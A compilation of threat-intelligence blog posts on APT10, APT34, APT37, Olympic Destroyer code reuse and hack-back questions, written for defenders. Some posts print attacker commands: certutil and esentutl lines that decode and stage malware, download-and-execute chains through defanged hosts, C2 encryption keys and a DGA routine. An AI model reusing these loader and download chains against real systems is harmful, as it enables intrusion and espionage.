In July 2018, FireEye devices detected and blocked what appears to be APT10 (Menupass) activity targeting the Japanese media sector. APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009, and they have a history of targeting Japanese entities.

In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. This backdoor is well-known in the security community as ANEL, and it used to come in beta or RC (release candidate) until recently. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor.

Attack Overview

The attack starts with Microsoft Word documents containing a malicious VBA macro being attached to spear phishing emails. Although the contents of the malicious documents are unreadable (see Figure 3), the Japanese titles are related to maritime, diplomatic, and North Korean issues. Table 1 shows the UPPERCUT indicators of compromise (IoCs).

File Name

MD5

Size

C2

自民党海洋総合戦略小委員会が政府に提言申し入れ.doc

Government Recommendations from the Liberal Democratic Party’s Comprehensive Strategic Maritime Subcommittee

4f83c01e8f7507d23c67ab085bf79e97

843022

eservake.jetos[.]com

82.221.100.52

151.106.53.147

グテマラ大使講演会案内状.doc

Invitation to Lecture by Guatemalan Ambassador

f188936d2c8423cf064d6b8160769f21

720384

 

eservake.jetos[.]com

151.106.53.147

153.92.210.208 

米国接近に揺れる北朝鮮内部.doc

North Korean interior swayed by the approach of the United States

cca227f70a64e1e7fcf5bccdc6cc25dd

733184

eservake.jetos[.]com

153.92.210.208

167.99.121.203

Table 1: UPPERCUT IoCs

For the North Korean lure, a news article with an identical title was readily available online. It’s also worth noting that in the Guatemalan lure, the attacker used an unusual spelling of Guatemala in Japanese. The top result of a Google search using the same spelling led us to the event website for the lecture of the Guatemalan Ambassador, held in August 2018. Figure 1 shows the screenshot of the event page.


Figure 1: Event Website for the Lecture of Guatemala Ambassador

Figure 2 shows the macro function that displays the lure document. At the bottom of this function, we can see the readable text that matches the contact information found in Figure 1. Thus, people who would have an interest in Latin American issues may have been the targets of this campaign.


Figure 2: Macro to display lure document

The initial Word documents were password protected, likely in an effort to bypass detection. Once the password (delivered in the body of the email) is entered, the users are presented with a document that will request users to enable the malicious macro, as shown in Figure 3.


Figure 3: Lure document

Figure 4 shows what happens when the malicious macro is executed.


Figure 4: Macro to install UPPERCUT

The execution workflow is as follows:

1.     The macro drops three PEM files, padre1.txt, padre2.txt, and padre3.txt, to the victim’s %TEMP% folder and then copies them from %TEMP% to the %AllUserProfile% folder.

2.     The macro decodes the dropped files using Windows certutil.exe with the following commands (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows):

C:\Windows\System32\cmd.exe" /c certutil -decode C:\ProgramData\padre1.txt C:\ProgramData\\GUP.txt

C:\Windows\System32\cmd.exe" /c certutil -decode C:\ProgramData\padre2.txt C:\ProgramData\\libcurl.txt

C:\Windows\System32\cmd.exe" /c certutil -decode C:\ProgramData\padre3.txt C:\ProgramData\\3F2E3AB9

3.     The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) with the following commands (esentutil.exe is also a legitimate program that is pre-installed in Windows):

C:\Windows\System32\esentutl.exe" /y C:\ProgramData\\GUP.txt /d C:\ProgramData\GUP.exe /o

C:\Windows\System32\esentutl.exe" /y C:\ProgramData\\libcurl.txt /d C:\ProgramData\libcurl.dll /o

The dropped files include the following:

  • GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates. The version used here is version 4.1 digitally signed by Notepad++, as shown in Figure 5.
  • libcurl.dll: Malicious Loader DLL
  • 3F2E3AB9: Encrypted shellcode


Figure 5: Notepad++ signed updater

4.     The macro launches the legitimate executable GUP.exe.

  • The executable sideloads the malicious DLL (libcurl.dll), which decrypts and runs shellcode (3F2E3AB9) located in the same folder.
  • The shellcode decodes and decompresses another DLL, which is an updated variant of UPPERCUT. Before decoding the DLL, the shellcode uses an anti-debug technique based on ntdll_NtSetInformationThread which causes the thread to be detached from the debugger, as shown in Figure 6. The DLL is then loaded into memory and the randomly named exported function is called.


Figure 6: Anti-debug technique used by shellcode

5.     The macro deletes the initially dropped .txt files using Windows esentutl.exe and changes the document text to an embedded message.

The complete attack overview is shown in Figure 7.


Figure 7: Attack overview

Several threat actors leverage the technique of using Windows certutil.exe for payload decoding, and APT10 continues to employ this technique.

Evolution of UPPERCUT

Figure 8 shows the timeline of updates for UPPERCUT. The PE compile time of loaders and the create time of droppers (Word documents) are plotted in the graph. The compile time of loaders in the newer version(s) are not shown here since the timestamps are overwritten and filled with zeroes. We don’t have visibility into UPPERCUT 5.2.x series, but it’s possible that minor revisions were released every few months between December 2017 and May 2018.


Figure 8: Timeline of UPPERCUT updates

Unlike previous versions, the exported function names are randomized in the latest version (Table 2).

Encoded Payload

Decoded Payload

MD5

Size

Import Hash

Exported Function

Version

aa3f303c3319b14b4829fe2faa5999c1

322164

182ee99b4f0803628c30411b1faa9992

l7MF25T96n45qOGWX

5.3.2

126067d634d94c45084cbe1d9873d895

330804

5f45532f947501cf024d84c36e3a19a1

hJvTJcdAU3mNkuvGGq7L

5.4.1

fce54b4886cac5c61eda1e7605483ca3

345812

c1942a0ca397b627019dace26eca78d8

WcuH

5.4.1

Table 2: Static characteristics of UPPERCUT

Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server. The error code is the value returned by the GetLastError function and sent in the next beacon. This was likely included to help the attackers understand the problem if the backdoor is unable to receive a response (Figure 9). This Cookie header is a unique indicator that can be used for network-based detection.


Figure 9: Example of callback

Earlier versions of UPPERCUT used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. However, in the latest version, the keys are hard-coded uniquely for each C2 address and use the C2’s calculated MD5 hash to determine which key to use, as shown in Figure 10.


Figure 10: Blowfish key generation

For instance, Table 3 lists the hard-coded C2 addresses, their MD5 hash, and the corresponding Blowfish key in the decoded payload of 126067d634d94c45084cbe1d9873d895.

C2

MD5

Blowfish Key

hxxp[:]//151.106.53[.]147/VxQG

f613846eb5bed227ec1a5f8df7e678d0

bdc4b9f5af9868e028dd0adc10099a4e6656e9f0ad12b2e75a30f5ca0e34489d

hxxp[:]//153.92.210[.]208/wBNh1

50c60f37922ff2ff8733aaeaa9802da5

fb9f7fb3c709373523ff27824ed6a31d800e275ec5217d8a11024a3dffb577dd

hxxp[:]//eservake.jetos[.]com/qIDj

c500dae1ca41236830b59f1467ee96c1

d3450966ceb2eba93282aace7d7684380d87c6621bbd3c4f621caa079356004a

Default

 Default

f12df6984bb65d18e2561bd017df29ee1cf946efa5e510802005aeee9035dd53

Table 3: Example of Blowfish keys

In this example, the MD5 hash of hxxp[:]//151.106.53[.]147/VxQG will be f613846eb5bed227ec1a5f8df7e678d0. When the malware interacts with this URL, bdc4b9f5af9868e028dd0adc10099a4e6656e9f0ad12b2e75a30f5ca0e34489d will be selected as a Blowfish key. If the MD5 hash of the URL does not match any of the listed hashes, then the default key f12df6984bb65d18e2561bd017df29ee1cf946efa5e510802005aeee9035dd53 will be used.

Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication. Table 4 shows the parameters sent to C2 server from the backdoor in the newer versions. These are sent via POST request, as shown in Figure 9.


Table 4: URL parameters

Additionally, the command string is hashed using the same RGPH hashing algorithm as before. Two more commands, 0xD290626C85FB1CE3 and 0x409C7A89CFF0A727, are supported in the newer versions (Table 5).

Commands

Description

0x97A168D9697D40DD

Download and validate file (XXHash comparison) from C2 server

0x7CF812296CCC68D5

Upload file to C2 server

0x652CB1CEFF1C0A00

Load PE file

0x27595F1F74B55278

Download, validate (XXHash comparison), execute file, and send output to C2 server

0xD290626C85FB1CE3

Format the current timestamp

0x409C7A89CFF0A727

Capture the desktop screenshot in PNG format and send it to C2

None of the above

The received buffer is executed via cmd.exe and the output is then sent to the C2 server

Table 5: Supported commands

Conclusion

While APT10 consistently targets the same geolocation and industry, the malware they use is actively evolving. In the newer versions of UPPERCUT, there is a significant change in the way backdoor initializes the Blowfish encryption key, which makes it harder for analysts to detect and decrypt the backdoor’s network communications. This shows that APT10 is very capable of maintaining and updating their malware.

To mitigate the threat, users are advised to disable Office macros in their settings and not to open documents from unknown sources. FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat with the following detection names:

  • APT.Backdoor.Win.UPPERCUT
  • FE_APT_Backdoor_Win32_UPPERCUT

Bejtlich on the APT1 Report: No Hack Back

Before reading the rest of this post, I suggest reading Mandiant/FireEye's statement Doing Our Part -- Without Hacking Back.

I would like to add my own color to this situation.

First, at no time when I worked for Mandiant or FireEye, or afterwards, was there ever a notion that we would hack into adversary systems. During my six year tenure, we were publicly and privately a "no hack back" company. I never heard anyone talk about hack back operations. No one ever intimated we had imagery of APT1 actors taken with their own laptop cameras. No one even said that would be a good idea.

Second, I would never have testified or written, repeatedly, about our company's stance on not hacking back if I knew we secretly did otherwise. I have quit jobs because I had fundamental disagreements with company policy or practice. I worked for Mandiant from 2011 through the end of 2013, when FireEye acquired Mandiant, and stayed until last year (2017). I never considered quitting Mandiant or FireEye due to a disconnect between public statements and private conduct.

Third, I was personally involved with briefings to the press, in public and in private, concerning the APT1 report. I provided the voiceover for a 5 minute YouTube video called APT1: Exposing One of China's Cyber Espionage Units. That video was one of the most sensitive, if not the most sensitive, aspects of releasing the report. We showed the world how we could intercept adversary communications and reconstruct it. There was internal debate about whether we should do that. We decided to cover the practice in the report, as Christopher Glyer Tweeted:


In none of these briefings to the press did we show pictures or video from adversary laptops. We did show the video that we published to YouTube.

Fourth, I privately contacted former Mandiant personnel with whom I worked during the time of the APT1 report creation and distribution. Their reaction to Mr Sanger's allegations ranged from "I've never heard of that" to "completely false." I asked former Mandiant colleagues, like myself, in the event that current Mandiant or FireEye employees were told not to talk to outsiders about the case.

What do I think happened here? I agree with the theory that Mr Sanger misinterpreted the reconstructed RDP sessions for some sort of "camera access." I have no idea about the "bros" or "leather jackets" comments!

In the spirit of full disclosure, prior to publication, Mr Sanger tried to reach me to discuss his book via email. I was sick and told him I had to pass. Ellen Nakashima also contacted me; I believe she was doing research for the book. She asked a few questions about the origin of the term APT, which I answered. I do not have the book so I do not know if I am cited, or if my message was included.

The bottom line is that Mandiant and FireEye did not conduct any hack back for the APT1 report.

Update: Some of you wondered about Ellen's role. I confirmed last night that she was working on her own project.

From Russia(?) with Code

The Olympic Destroyer cyberattack is a very recent and notable attack by sophisticated threat actors against a globally renowned 2-week sporting event that takes place once every four years in a different part of the world. Successfully attacking the Winter Olympics requires motivation, planning, resources and time.

Cyberattack campaigns are often a reflection of real world tensions and provide insight into the possible suspects in the attack. Much has been written about the perpetrators behind Olympic Destroyer emanating from either North Korea or Russia. Both have motivations. North Korea would like to embarrass its sibling South Korea, the holders of the 23rd Winter Olympics. Russia could be seeking revenge for the IOC ban on their team. And Russia has precedence, having previously been blamed for attacks on other sporting organizations, such as the intrusion at the World Anti Doping Agency that was targeted via a stolen International Olympic Committee account.

There has been much said about attribution, with accusations of misleading false flags and anti-forensics built into the malware. As Talos points out in their report, attribution is hard.

But attribution is not just hard, it’s often a wilderness of mirrors and, more often than not, a bit anticlimactic.

The motivation of our following analysis is not to point the finger of blame about who did the attacking, but to utilize our expertise in analyzing malware code and understanding the behaviors it exhibits to highlight the heritage, evolution and commonalities we found in the code of the Olympic Destroyer malware.

Initial Samples of Code Reuse

Besides analyzing the behavior of a sample, our sandbox performs several levels of code analysis, eventually extracting all code components, regardless if they are run at run-time or not. As we described in a blog post a few years ago, this technique is essential if we are to detect any dormant functionality that might be present within the sample.

After decomposing the code components in normalized basic blocks, the sandbox computes smart code hashes that are stored and indexed in our threat intelligence knowledge base. Over the last 3 years we have been collecting code hashes for millions of files, so when we want to hunt for other samples related to the same actor, we are able to query our backend for any other binaries that have been reusing significant amounts of code.

The rationale being that actors usually build up their code base over time, and reuse it over and over again across different campaigns. Code surely might evolve, but some components are bound to remain the same. This is the intuition that drove our investigation on Olympic Destroyer further. The first results were obviously some variants of the Olympic Destroyer binaries which we have already mentioned in our previous post. However, it quickly got way more interesting.

A very specific code hash led us through this process: 7CE26E95118044757D3C7A97CF9D240A (Lastline customers can use it to query our Global Threat Intelligence Network). This rare code hash surprisingly linked 21ca710ed3bc536bd5394f0bff6d6140809156cf, a payload of the Olympic Destroyer campaign, with some other samples of a remote access trojan, “TVSpy.” Though the actual internal name of the threat is TVRAT, the malware is known and labelled in VirusTotal as Trojan.Pavica or Trojan.Mezzo, none of which were previously connected to the original Olympic Destroyer campaign.

Figure 1 shows the actual code referenced by the code hash: it is a function used to read a buffer, and subsequently parse PE header from it.

Figure 1: The code referenced by the code hash 7CE26E95118044757D3C7A97CF9D240A shared by both the Olympic Destroyer sample 21ca710ed3bc536bd5394f0bff6d6140809156cf sha1 and TVSpy sample a61b8258e080857adc2d7da3bd78871f88edec2c.

This is not where code re-usage ends, as the actual function referencing and invoking the following fragment (see Figure 2) also shares almost all of the same logic. This function is responsible for loading PE file from the memory buffer and executing an entry point.

Figure 2: Function responsible for loading PE file from memory reused in both Olympic Destroyer and TV Spy

A Deeper Dive Based on Unusual Code

We decided to further investigate this piece of code since loading PE from memory is not all that common. Its origin opened several questions:

  1. Why is that piece of code the only link between the two samples?
  2. Were there any other samples sharing the same code?

Our first discovery was a Remote Access trojan called TVSpy, mentioned above. This family has been the subject of a few previous research investigations, and a recent Benkow Lab blog post (from November 2017) even reported that the source code was available on github.

Unfortunately, all links to github are now dead. But that didn’t stop us from finding the actual source code (or at least evidence that it was indeed published at some point). Apparently it was sold for $US500 on an underground Russian forum in 2015. Even though the original post and links are gone, a Russian information security forum kept a copy of the source code package alongside a description of the original sale announcement (see Figure 3).

Figure 3: TVSpy code as sold in an underground forum (according to researchers from ru-sfera.org)

Not Enough – The Investigation Continued

Although interesting, this connection was eventually not enough to connect Olympic Destroyer to Russia or to TVSpy. So we kept digging. Further research finally identified the code in Figures 1 and 2 to be part of an open source project called LoadDLL (see Figure 4) and available on codeproject.com (first published back in March 2014).

Figure 4: Fragment of LoadDLL source code from LoadDLL project

However, a couple things still didn’t add up: why had we only managed to identify samples from 2017 even if the source code was released in 2014? What about older versions of TVSpy? How come our search didn’t return any of those samples? Were Olympic Destroyer and TVSpy samples from 2017 sharing more than just the LoadDLL code?

Apparently TVSpy went through a few transformations. Samples from 2015 did embed and use the LoadDLL code, but the compiler did some specific optimizations that made the code unique (see Figure 5). In particular the compiler optimized out both “flags” (not used in the function) and “read_proc” (statically link function) from the parameters of LoadDll, but it couldn’t optimize out a “if (read_proc)” check even though it is useless since “read_proc” is not passed as a parameter anymore.

Figure 5. Reconstructed source code of LoadDll from TVSpy dated back to 2015

The “read_proc” function itself is also identical to one from source code (see Figures 6 and 7) and as you can see in Figure 8, it also gets called exactly the same way as the original source code from codeproject.com.

Figure 6: read_proc function implementation

Figure 7: read_proc function implementation

The most interesting aspect for us is in fact the version of TVSpy that dates back to 2017-2018 and shares with Olympic Destroyer almost the exact binary code of LoadDLL. You can see LoadDll_LoadHeaders for those samples in Figure 9: as you might notice the function looks different then the one from the older version (see Figure 8).

Figure 8. Reconstructed source code of LoadDLL_LoadHeaders function from TVSpy dated back to 2015

First, we thought that the authors added new checks before calling read_proc function, making clear link between Olympic Destroyer and TVSpy (how, after all, could there be the same code modifications if the authors were not the same?). However, after further review we figured that read_proc didn’t exist anymore. Instead it was compiled inline resulting in a statically linked memcpy function.

Figure 9. Reconstructed LoadDLL_LoadHeaders from TVSpy and OlympicDestroyer samples, including additional check due to inlining of the read_proc function.

Also the meaningless check in LoadDll (“if (read_proc)”) we mentioned before has disappeared in the new version of the code (see Figure 10).

Figure 10. Reconstructed LoadDLL_LoadHeaders from TVSpy and Olympic Destroyer samples, including additional check due to inlining of the read_proc function.

The Bottom Line – Evidence is Inconclusive

In conclusion, we believe that this is not enough evidence to substantiate a claim that Olympic Destroyer and new versions of TVSpy using the same modified source code are built by the same author.

The more probable version for us is that the sample was built on a new compiler that further optimized the code. It would still mean that both new version of TVSpy and Olympic Destroyer are built using the same toolchain configured in the very same way (to enable full optimization and link C++ runtime statically). We actually went to the extent of compiling the LoadDLL on MS Visual Studio 2017 with C++ runtime statically linked, and we managed to get the very same code as the one included in both Olympic Destroyer and TVSpy.

Although we would have liked to finally solve the dilemma, and unveil which were the actors behind the Olympic Destroyer attack, we ended up with more questions than answers, but admittedly, that’s what research sometimes is about.

First, why would the authors of an allegedly state sponsored malware use an old LoadDLL project from an open source project from 2014? It is hard to believe that they could not come up with their own implementation or use much more advanced open-source projects for that, and definitely not relying on an educational prototype buried way beyond the first page of results in Google.

Or maybe the actors were not that much advanced as we would like to think, maybe seeing this as a one-time job, without enough resources to avoid using publicly available source code to quickly build their malware? Or maybe it’s just another red flag, and the real authors decided to use the TVSpy source code as released in 2015 to leave a “Russian fingerprint”?

Maybe all of the above?

At the beginning of this article we stated that attribution is not just hard, it’s often a wilderness of mirrors and more often than not, a bit anticlimactic. As a matter of fact, that was quite a precise prediction.

The post From Russia(?) with Code appeared first on Lastline.

APT37 (Reaper): The Overlooked North Korean Actor

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).

Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123.

Read our report, APT37 (Reaper): The Overlooked North Korean Actor, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:

  • Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.
  • Initial Infection Tactics: Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.
  • Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.
  • Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.
  • Malware: A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.

More information on this threat actor is found in our report, APT37 (Reaper): The Overlooked North Korean Actor. You can also register for our upcoming webinar for additional insights into this group.

Remembering When APT Became Public

Last week I Tweeted the following on the 8th anniversary of Google's blog post about its compromise by Chinese threat actors:

This intrusion made the term APT mainstream. I was the first to associate it with Aurora, in this post 

https://taosecurity.blogspot.com/2010/01/google-v-china.html

My first APT post was a careful reference in 2007, when we all feared being accused of "leaking classified" re China: 

https://taosecurity.blogspot.com/2007/10/air-force-cyberspace-report.html

I should have added the term "publicly" to my original Tweet. There were consultants with years of APT experience involved in the Google incident response, and they recognized the work of APT17 at that company and others. Those consultants honored their NDAs and have stayed quiet.

I wrote my original Tweet as a reminder that "APT" was not a popular, recognized term until the Google announcement on 12 January 2010. In my Google v China blog post I wrote:

Welcome to the party, Google. You can use the term "advanced persistent threat" (APT) if you want to give this adversary its proper name.

I also Tweeted a similar statement on the same day:

This is horrifying: http://bit.ly/7x7vVW Google admits intellectual property theft from China; it's called Advanced Persistent Threat, GOOG

I made the explicit link of China and APT because no one had done that publicly.

This slide from a 2011 briefing I did in Hawaii captures a few historical points:


The Google incident was a watershed, for reasons I blogged on 16 January 2010. I remember the SANS DFIR 2008 event as effectively "APTCon," but beyond Mandiant, Northrup Grumman, and NetWitness, no one was really talking publicly about the APT until after Google.

As I noted in the July 2009 blog post, You Down With APT? (ugh):

Aside from Northrup Grumman, Mandiant, and a few vendors (like NetWitness, one of the full capture vendors out there) mentioning APT, there's not much else available. A Google search for "advanced persistent threat" -netwitness -mandiant -Northrop yields 34 results (prior to this blog post). (emphasis added)

Today that search yields 244,000 results.

I would argue we're "past APT." APT was the buzzword for RSA and other vendor-centric events from, say, 2011-2015, with 2013 being the peak following Mandiant's APT1 report.

The threat hasn't disappeared, but it has changed. I wrote my Tweet to mark a milestone and to note that I played a small part in it.

All my APT posts here are reachable by this APT tag. Also see my 2010 article for Information Security Magazine titled What APT Is, and What It Isn't.

New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit

Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.

We believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.

APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199.

In this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.

The full report on APT34 is available to our MySIGHT customer community. APT34 loosely aligns with public reporting related to the group "OilRig". As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.

CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability

CVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.

The vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It is created as a separate process instead of child process of Office applications. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. As the EQNEDT32.exe is compiled using an older compiler and does not support address space layout randomization (ASLR), a technique that guards against the exploitation of memory corruption vulnerabilities, the attacker can easily alter the flow of program execution.

Analysis

APT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882, which corrupts the memory on the stack and then proceeds to push the malicious data to the stack. The malware then overwrites the function address with the address of an existing instruction from EQNEDT32.EXE. The overwritten instruction (displayed in Figure 1) is used to call the “WinExec” function from kernel32.dll, as depicted in the instruction at 00430c12, which calls the “WinExec” function.


Figure 1: Disassembly of overwritten function address

After exploitation, the ‘WinExec’ function is successfully called to create a child process, “mshta.exe”, in the context of current logged on user. The process “mshta.exe” downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.


Figure 2: Attacker data copied to corrupt stack buffer

Execution Workflow

The malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.


Figure 3: CVE-2017-11882 and POWRUNER attack sequence

  1. The malicious .rtf file exploits CVE-2017-11882.
  2. The malware overwrites the function address with an existing instruction from EQNEDT32.EXE.
  3. The malware creates a child process, “mshta.exe,” which downloads a file from: hxxp://mumbai-m[.]site/b.txt.
  4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.
  5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\ProgramData\Windows\Microsoft\java\
  6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.
  7. cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.
  8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.
  9. cUpdateCheckers.bat and *.base are deleted from the staging directory.

Figure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.


Figure 4: Execution Workflow Section of v.vbs

After successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads – they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. 

hUpdateCheckers.ps1 (POWRUNER)

The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.


Figure 5: POWRUNER PowerShell script hUpdateCheckers.ps1

POWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either “not_now” or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. The command values and the associated actions are described in Table 1.

Command

Description

Action

0

Server response string contains batch commands

Execute batch commands and send results back to server

1

Server response string is a file path

Check for file path and upload (PUT) the file to server

2

Server response string is a file path

Check for file path and download (GET) the file

Table 1: POWRUNER commands

After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.

The C2 server can also send a PowerShell command to capture and store a screenshot of a victim’s system. POWRUNER will send the captured screenshot image file to the C2 server if the “fileupload” command is issued. Figure 6 shows the PowerShell “Get-Screenshot” function sent by the C2 server.


Figure 6: Powershell Screenshot Functionality

dUpdateCheckers.ps1 (BONDUPDATER)

One of the recent advancements by APT34 is the use of DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string “B007”, uses a custom DGA algorithm to generate subdomains for communication with the C2 server.

DGA Implementation

Figure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER’s custom DGA.


Figure 7: Breakdown of subdomain created by BONDUPDATER

  1. This is a randomly generated number created using the following expression: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));
  2. This value is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.
  3. Initially set to 000, then incremented by 3 after every DNS request
  4. First 12 characters of system UUID.
  5. “B007” hardcoded string.
  6. Hardcoded domain “mumbai-m[.]site”

BONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:

  1. Create a temporary file in %temp% location
    • The file created will have the last two octets of the resolved IP addresses as its filename.
  2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.

Character

Description

0

File contains batch commands, it executes the batch commands

1

Rename the temporary file as .ps1 extension

2

Rename the temporary file as .vbs extension

Table 2: BONDUPDATER Actions

Figure 8 is a screenshot of BONDUPDATER’s DGA implementation.


Figure 8: Domain Generation Algorithm

Some examples of the generated subdomains observed at time of execution include:

143610035BAF04425847B007.mumbai-m[.]site

835710065BAF04425847B007.mumbai-m[.]site

376110095BAF04425847B007.mumbai-m[.]site

Network Communication

Figure 9 shows example network communications between a POWRUNER backdoor client and server.


Figure 9: Example Network Communication

In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with ‘0’, POWRUNER sends another random GET request to receive  an additional command string. The C2 server sends back Base64 encoded response.

If the server had sent the string “not_now” as response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.


Figure 10: Example "not now" server response

Batch Commands

POWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.


Figure 11: Batch commands sent by POWRUNER C2 server

Additional Use of POWRUNER / BONDUPDATER

APT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8) that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from:

hxxp://94.23.172.164/dupdatechecker.doc.

As shown in Figure 12, the script within the dupatechecker.doc file attempts to download another file named dupatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be an apparent taunt to security researchers.


Figure 12: Contents of dupdatechecker.doc script

The dupatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.

Outlook and Implications

Recent activity by APT34 demonstrates that they are capable group with potential access to their own development resources. During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East. We assess that APT34’s efforts to continuously update their malware, including the incorporation of DGA for C2, demonstrate the group’s commitment to pursing strategies to deter detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.

IOCs

Filename / Domain / IP Address

MD5 Hash or Description

CVE-2017-11882 exploit document

A0E6933F4E0497269620F44A083B2ED4

b.txt

9267D057C065EA7448ACA1511C6F29C7

